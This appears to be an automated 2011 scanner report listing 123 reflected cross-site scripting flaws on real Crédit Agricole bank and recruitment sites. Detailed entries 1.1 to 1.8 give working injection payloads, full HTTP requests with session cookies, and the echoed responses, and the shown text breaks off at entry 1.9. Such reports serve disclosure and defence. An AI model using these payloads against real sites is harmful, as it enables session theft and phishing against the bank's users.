XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, creditagricole

Report generated by XSS.CX at Mon Sep 12 10:42:52 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. http://www.credit-agricole.com/en/content/search [SearchText parameter]

1.2. http://www.credit-agricole.com/en/content/search [SearchText parameter]

1.3. http://www.credit-agricole.com/en/content/search [SearchText parameter]

1.4. http://www.creditagricole.info/fnca/ca2_7679/fr/tram-train-a-la-reunion [REST URL parameter 3]

1.5. http://www.creditagricole.info/fnca/ca2_7679/fr/tram-train-a-la-reunion [REST URL parameter 4]

1.6. http://www.mycreditagricole.jobs/ [lang parameter]

1.7. http://www.mycreditagricole.jobs/ [lang parameter]

1.8. http://www.mycreditagricole.jobs/ [name of an arbitrarily supplied request parameter]

1.9. http://www.mycreditagricole.jobs/ [name of an arbitrarily supplied request parameter]

1.10. http://www.mycreditagricole.jobs/ [version parameter]

1.11. http://www.mycreditagricole.jobs/ [version parameter]

1.12. http://www.mycreditagricole.jobs/acti_asset_insurance_bank.php [name of an arbitrarily supplied request parameter]

1.13. http://www.mycreditagricole.jobs/acti_asset_insurance_bank.php [name of an arbitrarily supplied request parameter]

1.14. http://www.mycreditagricole.jobs/acti_finance_invest.php [name of an arbitrarily supplied request parameter]

1.15. http://www.mycreditagricole.jobs/acti_finance_invest.php [name of an arbitrarily supplied request parameter]

1.16. http://www.mycreditagricole.jobs/acti_retailbank_france.php [name of an arbitrarily supplied request parameter]

1.17. http://www.mycreditagricole.jobs/acti_retailbank_france.php [name of an arbitrarily supplied request parameter]

1.18. http://www.mycreditagricole.jobs/acti_retailbank_inter.php [name of an arbitrarily supplied request parameter]

1.19. http://www.mycreditagricole.jobs/acti_retailbank_inter.php [name of an arbitrarily supplied request parameter]

1.20. http://www.mycreditagricole.jobs/acti_special_financial.php [name of an arbitrarily supplied request parameter]

1.21. http://www.mycreditagricole.jobs/acti_special_financial.php [name of an arbitrarily supplied request parameter]

1.22. http://www.mycreditagricole.jobs/acti_special_subsidiaries.php [name of an arbitrarily supplied request parameter]

1.23. http://www.mycreditagricole.jobs/acti_special_subsidiaries.php [name of an arbitrarily supplied request parameter]

1.24. http://www.mycreditagricole.jobs/acti_support.php [name of an arbitrarily supplied request parameter]

1.25. http://www.mycreditagricole.jobs/acti_support.php [name of an arbitrarily supplied request parameter]

1.26. http://www.mycreditagricole.jobs/activities_careers.php [name of an arbitrarily supplied request parameter]

1.27. http://www.mycreditagricole.jobs/activities_careers.php [name of an arbitrarily supplied request parameter]

1.28. http://www.mycreditagricole.jobs/apply.php [name of an arbitrarily supplied request parameter]

1.29. http://www.mycreditagricole.jobs/apply.php [name of an arbitrarily supplied request parameter]

1.30. http://www.mycreditagricole.jobs/cagroup.php [name of an arbitrarily supplied request parameter]

1.31. http://www.mycreditagricole.jobs/cagroup.php [name of an arbitrarily supplied request parameter]

1.32. http://www.mycreditagricole.jobs/cagroup_activities.php [name of an arbitrarily supplied request parameter]

1.33. http://www.mycreditagricole.jobs/cagroup_activities.php [name of an arbitrarily supplied request parameter]

1.34. http://www.mycreditagricole.jobs/cagroup_key_figures.php [name of an arbitrarily supplied request parameter]

1.35. http://www.mycreditagricole.jobs/cagroup_key_figures.php [name of an arbitrarily supplied request parameter]

1.36. http://www.mycreditagricole.jobs/cagroup_locations.php [name of an arbitrarily supplied request parameter]

1.37. http://www.mycreditagricole.jobs/cagroup_locations.php [name of an arbitrarily supplied request parameter]

1.38. http://www.mycreditagricole.jobs/divers_disab_events.php [name of an arbitrarily supplied request parameter]

1.39. http://www.mycreditagricole.jobs/divers_disab_events.php [name of an arbitrarily supplied request parameter]

1.40. http://www.mycreditagricole.jobs/divers_disability.php [name of an arbitrarily supplied request parameter]

1.41. http://www.mycreditagricole.jobs/divers_disability.php [name of an arbitrarily supplied request parameter]

1.42. http://www.mycreditagricole.jobs/divers_microfinance.php [name of an arbitrarily supplied request parameter]

1.43. http://www.mycreditagricole.jobs/divers_microfinance.php [name of an arbitrarily supplied request parameter]

1.44. http://www.mycreditagricole.jobs/diversity.php [name of an arbitrarily supplied request parameter]

1.45. http://www.mycreditagricole.jobs/diversity.php [name of an arbitrarily supplied request parameter]

1.46. http://www.mycreditagricole.jobs/entities.php [name of an arbitrarily supplied request parameter]

1.47. http://www.mycreditagricole.jobs/entities.php [name of an arbitrarily supplied request parameter]

1.48. http://www.mycreditagricole.jobs/etudiants.php [name of an arbitrarily supplied request parameter]

1.49. http://www.mycreditagricole.jobs/etudiants.php [name of an arbitrarily supplied request parameter]

1.50. http://www.mycreditagricole.jobs/exp_forums.php [name of an arbitrarily supplied request parameter]

1.51. http://www.mycreditagricole.jobs/exp_forums.php [name of an arbitrarily supplied request parameter]

1.52. http://www.mycreditagricole.jobs/exp_key_figures.php [name of an arbitrarily supplied request parameter]

1.53. http://www.mycreditagricole.jobs/exp_key_figures.php [name of an arbitrarily supplied request parameter]

1.54. http://www.mycreditagricole.jobs/exp_requirement.php [name of an arbitrarily supplied request parameter]

1.55. http://www.mycreditagricole.jobs/exp_requirement.php [name of an arbitrarily supplied request parameter]

1.56. http://www.mycreditagricole.jobs/exp_requirement_finance.php [name of an arbitrarily supplied request parameter]

1.57. http://www.mycreditagricole.jobs/exp_requirement_finance.php [name of an arbitrarily supplied request parameter]

1.58. http://www.mycreditagricole.jobs/exp_requirement_inspection.php [name of an arbitrarily supplied request parameter]

1.59. http://www.mycreditagricole.jobs/exp_requirement_inspection.php [name of an arbitrarily supplied request parameter]

1.60. http://www.mycreditagricole.jobs/exp_requirement_risk.php [name of an arbitrarily supplied request parameter]

1.61. http://www.mycreditagricole.jobs/exp_requirement_risk.php [name of an arbitrarily supplied request parameter]

1.62. http://www.mycreditagricole.jobs/exp_video_room.php [name of an arbitrarily supplied request parameter]

1.63. http://www.mycreditagricole.jobs/exp_video_room.php [name of an arbitrarily supplied request parameter]

1.64. http://www.mycreditagricole.jobs/experimentes.php [name of an arbitrarily supplied request parameter]

1.65. http://www.mycreditagricole.jobs/experimentes.php [name of an arbitrarily supplied request parameter]

1.66. http://www.mycreditagricole.jobs/faq.php [name of an arbitrarily supplied request parameter]

1.67. http://www.mycreditagricole.jobs/faq.php [name of an arbitrarily supplied request parameter]

1.68. http://www.mycreditagricole.jobs/grad_campus_captains.php [name of an arbitrarily supplied request parameter]

1.69. http://www.mycreditagricole.jobs/grad_campus_captains.php [name of an arbitrarily supplied request parameter]

1.70. http://www.mycreditagricole.jobs/grad_campus_forums.php [name of an arbitrarily supplied request parameter]

1.71. http://www.mycreditagricole.jobs/grad_campus_forums.php [name of an arbitrarily supplied request parameter]

1.72. http://www.mycreditagricole.jobs/grad_campus_partnerships.php [name of an arbitrarily supplied request parameter]

1.73. http://www.mycreditagricole.jobs/grad_campus_partnerships.php [name of an arbitrarily supplied request parameter]

1.74. http://www.mycreditagricole.jobs/grad_key_figures.php [name of an arbitrarily supplied request parameter]

1.75. http://www.mycreditagricole.jobs/grad_key_figures.php [name of an arbitrarily supplied request parameter]

1.76. http://www.mycreditagricole.jobs/grad_video_room.php [name of an arbitrarily supplied request parameter]

1.77. http://www.mycreditagricole.jobs/grad_video_room.php [name of an arbitrarily supplied request parameter]

1.78. http://www.mycreditagricole.jobs/grad_vie.php [name of an arbitrarily supplied request parameter]

1.79. http://www.mycreditagricole.jobs/grad_vie.php [name of an arbitrarily supplied request parameter]

1.80. http://www.mycreditagricole.jobs/hrpolicy.php [name of an arbitrarily supplied request parameter]

1.81. http://www.mycreditagricole.jobs/hrpolicy.php [name of an arbitrarily supplied request parameter]

1.82. http://www.mycreditagricole.jobs/hrpolicy_benefit_resp.php [name of an arbitrarily supplied request parameter]

1.83. http://www.mycreditagricole.jobs/hrpolicy_benefit_resp.php [name of an arbitrarily supplied request parameter]

1.84. http://www.mycreditagricole.jobs/hrpolicy_career.php [name of an arbitrarily supplied request parameter]

1.85. http://www.mycreditagricole.jobs/hrpolicy_career.php [name of an arbitrarily supplied request parameter]

1.86. http://www.mycreditagricole.jobs/hrpolicy_personal.php [name of an arbitrarily supplied request parameter]

1.87. http://www.mycreditagricole.jobs/hrpolicy_personal.php [name of an arbitrarily supplied request parameter]

1.88. http://www.mycreditagricole.jobs/hrpolicy_recruitment.php [name of an arbitrarily supplied request parameter]

1.89. http://www.mycreditagricole.jobs/hrpolicy_recruitment.php [name of an arbitrarily supplied request parameter]

1.90. http://www.mycreditagricole.jobs/hrpolicy_remuneration.php [name of an arbitrarily supplied request parameter]

1.91. http://www.mycreditagricole.jobs/hrpolicy_remuneration.php [name of an arbitrarily supplied request parameter]

1.92. http://www.mycreditagricole.jobs/index.php [name of an arbitrarily supplied request parameter]

1.93. http://www.mycreditagricole.jobs/index.php [name of an arbitrarily supplied request parameter]

1.94. http://www.mycreditagricole.jobs/innovation.php [name of an arbitrarily supplied request parameter]

1.95. http://www.mycreditagricole.jobs/innovation.php [name of an arbitrarily supplied request parameter]

1.96. http://www.mycreditagricole.jobs/jeunes_diplomes.php [name of an arbitrarily supplied request parameter]

1.97. http://www.mycreditagricole.jobs/jeunes_diplomes.php [name of an arbitrarily supplied request parameter]

1.98. http://www.mycreditagricole.jobs/news.php [name of an arbitrarily supplied request parameter]

1.99. http://www.mycreditagricole.jobs/news.php [name of an arbitrarily supplied request parameter]

1.100. http://www.mycreditagricole.jobs/search_result.php [name of an arbitrarily supplied request parameter]

1.101. http://www.mycreditagricole.jobs/search_result.php [name of an arbitrarily supplied request parameter]

1.102. http://www.mycreditagricole.jobs/sitemap.php [name of an arbitrarily supplied request parameter]

1.103. http://www.mycreditagricole.jobs/sitemap.php [name of an arbitrarily supplied request parameter]

1.104. http://www.mycreditagricole.jobs/stud_campus_captains.php [name of an arbitrarily supplied request parameter]

1.105. http://www.mycreditagricole.jobs/stud_campus_captains.php [name of an arbitrarily supplied request parameter]

1.106. http://www.mycreditagricole.jobs/stud_campus_forums.php [name of an arbitrarily supplied request parameter]

1.107. http://www.mycreditagricole.jobs/stud_campus_forums.php [name of an arbitrarily supplied request parameter]

1.108. http://www.mycreditagricole.jobs/stud_campus_partnerships.php [name of an arbitrarily supplied request parameter]

1.109. http://www.mycreditagricole.jobs/stud_campus_partnerships.php [name of an arbitrarily supplied request parameter]

1.110. http://www.mycreditagricole.jobs/stud_internships.php [name of an arbitrarily supplied request parameter]

1.111. http://www.mycreditagricole.jobs/stud_internships.php [name of an arbitrarily supplied request parameter]

1.112. http://www.mycreditagricole.jobs/stud_key_figures.php [name of an arbitrarily supplied request parameter]

1.113. http://www.mycreditagricole.jobs/stud_key_figures.php [name of an arbitrarily supplied request parameter]

1.114. http://www.mycreditagricole.jobs/stud_orsay.php [name of an arbitrarily supplied request parameter]

1.115. http://www.mycreditagricole.jobs/stud_orsay.php [name of an arbitrarily supplied request parameter]

1.116. http://www.mycreditagricole.jobs/stud_part_time.php [name of an arbitrarily supplied request parameter]

1.117. http://www.mycreditagricole.jobs/stud_part_time.php [name of an arbitrarily supplied request parameter]

1.118. http://www.mycreditagricole.jobs/stud_video_room.php [name of an arbitrarily supplied request parameter]

1.119. http://www.mycreditagricole.jobs/stud_video_room.php [name of an arbitrarily supplied request parameter]

1.120. http://www.mycreditagricole.jobs/stud_vie.php [name of an arbitrarily supplied request parameter]

1.121. http://www.mycreditagricole.jobs/stud_vie.php [name of an arbitrarily supplied request parameter]

1.122. http://www.mycreditagricole.jobs/video_room.php [name of an arbitrarily supplied request parameter]

1.123. http://www.mycreditagricole.jobs/video_room.php [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 123 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.credit-agricole.com/en/content/search [SearchText parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.credit-agricole.com
Path:   /en/content/search

Issue detail

The value of the SearchText request parameter is copied into the HTML document as text between TITLE tags. The payload d9eea</title><x%20style%3dx%3aexpression(alert(1))>4dc10869d8e was submitted in the SearchText parameter. This input was echoed as d9eea</title><x style=x:expression(alert(1))>4dc10869d8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /en/content/search?SearchText=jobs+phone+contactd9eea</title><x%20style%3dx%3aexpression(alert(1))>4dc10869d8e&valider= HTTP/1.1
Host: www.credit-agricole.com
Proxy-Connection: keep-alive
Referer: http://www.credit-agricole.com/en
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eZSESSID82a9e4d26595c87ab6e442391d8c5bba=6ec3a4f29e68e73a4f47cf5f501021ce; xtvrn=$446407$; eZSESSID9cfefed8fb9497baa5cd519d7d2bb5d7=5011bdf023055722038e88cbd6d0f072; xtan=-; xtant=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:02:02 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 11:02:02 GMT
X-Powered-By: eZ Publish
Served-by: www.credit-agricole.com
Content-language: en-GB
Vary: Accept-Encoding,User-Agent
Content-Length: 88029
Content-Type: text/html; charset=utf-8
Via: 1.1 www.credit-agricole.com
X-Cache: MISS from www.credit-agricole.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<hea
...[SNIP]...
<title>Search "jobs phone contactd9eea</title><x style=x:expression(alert(1))>4dc10869d8e" - page 1</title>
...[SNIP]...

1.2. http://www.credit-agricole.com/en/content/search [SearchText parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.credit-agricole.com
Path:   /en/content/search

Issue detail

The value of the SearchText request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe48d"%3balert(1)//0165f445b41 was submitted in the SearchText parameter. This input was echoed as fe48d";alert(1)//0165f445b41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/content/search?SearchText=jobs+phone+contactfe48d"%3balert(1)//0165f445b41&valider= HTTP/1.1
Host: www.credit-agricole.com
Proxy-Connection: keep-alive
Referer: http://www.credit-agricole.com/en
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eZSESSID82a9e4d26595c87ab6e442391d8c5bba=6ec3a4f29e68e73a4f47cf5f501021ce; xtvrn=$446407$; eZSESSID9cfefed8fb9497baa5cd519d7d2bb5d7=5011bdf023055722038e88cbd6d0f072; xtan=-; xtant=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:01:46 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 11:01:46 GMT
X-Powered-By: eZ Publish
Served-by: www.credit-agricole.com
Content-language: en-GB
Vary: Accept-Encoding,User-Agent
Content-Length: 87945
Content-Type: text/html; charset=utf-8
Via: 1.1 www.credit-agricole.com
X-Cache: MISS from www.credit-agricole.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<hea
...[SNIP]...
<!--
xt_mtcl = "jobs phone contactfe48d";alert(1)//0165f445b41"; //keyword value
xt_npg = "0"; //result page number (0 when no result)
//do not modify below
if (window.xtparam!=null){window.xtparam+="&mc="+xt_mtcl+"&np="+xt_npg;}
else{window.xtparam ="&mc="+xt_mt
...[SNIP]...

1.3. http://www.credit-agricole.com/en/content/search [SearchText parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.credit-agricole.com
Path:   /en/content/search

Issue detail

The value of the SearchText request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40a49"><x%20style%3dx%3aexpression(alert(1))>9982cd2f612 was submitted in the SearchText parameter. This input was echoed as 40a49"><x style=x:expression(alert(1))>9982cd2f612 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /en/content/search?SearchText=jobs+phone+contact40a49"><x%20style%3dx%3aexpression(alert(1))>9982cd2f612&valider= HTTP/1.1
Host: www.credit-agricole.com
Proxy-Connection: keep-alive
Referer: http://www.credit-agricole.com/en
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eZSESSID82a9e4d26595c87ab6e442391d8c5bba=6ec3a4f29e68e73a4f47cf5f501021ce; xtvrn=$446407$; eZSESSID9cfefed8fb9497baa5cd519d7d2bb5d7=5011bdf023055722038e88cbd6d0f072; xtan=-; xtant=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:01:42 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 11:01:42 GMT
X-Powered-By: eZ Publish
Served-by: www.credit-agricole.com
Content-language: en-GB
Vary: Accept-Encoding,User-Agent
Content-Length: 88010
Content-Type: text/html; charset=utf-8
Via: 1.1 www.credit-agricole.com
X-Cache: MISS from www.credit-agricole.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<hea
...[SNIP]...
<input type="text" name="SearchText" value="jobs phone contact40a49"><x style=x:expression(alert(1))>9982cd2f612" class="input_txt" id="search" />
...[SNIP]...

1.4. http://www.creditagricole.info/fnca/ca2_7679/fr/tram-train-a-la-reunion [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditagricole.info
Path:   /fnca/ca2_7679/fr/tram-train-a-la-reunion

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48377"><script>alert(1)</script>8057bf0bb42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fnca/ca2_7679/fr48377"><script>alert(1)</script>8057bf0bb42/tram-train-a-la-reunion HTTP/1.1
Host: www.creditagricole.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:52 GMT
Server: Apache
X-Jcms-Ajax-Id: AjaxCtxt-0-1315825492812
Connection: close
Content-Type: text/html;charset=UTF-8
Pragma:no-cache
Content-Length: 55398


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='fr' xml:lang='fr' dir='ltr' xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<a href="http://www.creditagricole.info/fnca/ca2_7679/fr48377"><script>alert(1)</script>8057bf0bb42/tram-train-a-la-reunion#menu">
...[SNIP]...

1.5. http://www.creditagricole.info/fnca/ca2_7679/fr/tram-train-a-la-reunion [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditagricole.info
Path:   /fnca/ca2_7679/fr/tram-train-a-la-reunion

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c6da"><script>alert(1)</script>4db6a1e6fa5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fnca/ca2_7679/fr/tram-train-a-la-reunion2c6da"><script>alert(1)</script>4db6a1e6fa5 HTTP/1.1
Host: www.creditagricole.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:05:17 GMT
Server: Apache
X-Jcms-Ajax-Id: AjaxCtxt-0-1315825517296
Connection: close
Content-Type: text/html;charset=UTF-8
Pragma:no-cache
Content-Length: 55399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='fr' xml:lang='fr' dir='ltr' xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<a href="http://www.creditagricole.info/fnca/ca2_7679/fr/tram-train-a-la-reunion2c6da"><script>alert(1)</script>4db6a1e6fa5#menu">
...[SNIP]...

1.6. http://www.mycreditagricole.jobs/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84ac5"-alert(1)-"4917365c010 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?lang=uk84ac5"-alert(1)-"4917365c010&version=Texte HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:26 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:26 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Emploi
...[SNIP]...
var SharingBaseTitle = "Emploi banque et Recrutement dans les m..tiers de la finance et de l'assurance - Groupe Cr..dit Agricole";
var SharingUrl = "http://www.recrutement.credit-agricole.com/?lang=uk84ac5"-alert(1)-"4917365c010&version=Texte";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePa
...[SNIP]...

1.7. http://www.mycreditagricole.jobs/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58490"><a>96ad14ea3c0 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?lang=uk58490"><a>96ad14ea3c0&version=Texte HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:09 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:09 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Emploi
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/?lang=uk58490"><a>96ad14ea3c0&version=Texte" />
...[SNIP]...

1.8. http://www.mycreditagricole.jobs/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 639d0"-alert(1)-"bf90bdcc82b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?639d0"-alert(1)-"bf90bdcc82b=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:23 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:23 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
var SharingBaseTitle = "Recruitment and employment opportunities in banking, finance and insurance professions - Cr..dit Agricole Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/?639d0"-alert(1)-"bf90bdcc82b=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.9. http://www.mycreditagricole.jobs/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

